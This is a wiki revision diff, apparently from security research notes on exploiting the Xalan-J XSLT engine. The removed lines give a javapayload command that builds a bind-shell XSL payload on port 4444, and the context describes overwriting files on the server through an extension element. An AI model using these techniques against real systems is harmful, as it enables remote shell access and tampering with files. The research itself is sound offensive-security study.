Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version Icon 72.1 Icon
edited by Nicolas Gregoire
on 2012/01/17 09:27
Change comment: There is no comment for this version
To version Icon 71.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 17:47
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -81,12 +81,6 @@
81 81  
82 82  It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-(
83 83  
84 -{{warning}}
85 -TODO : javapayload => loading arbitrary byte code (aka classes) via reflection
86 -$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 -- JSh
87 -Check supported versions of Xalan !
88 -{{/warning}}
89 -
90 90  = File creation =
91 91  
92 92  The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten.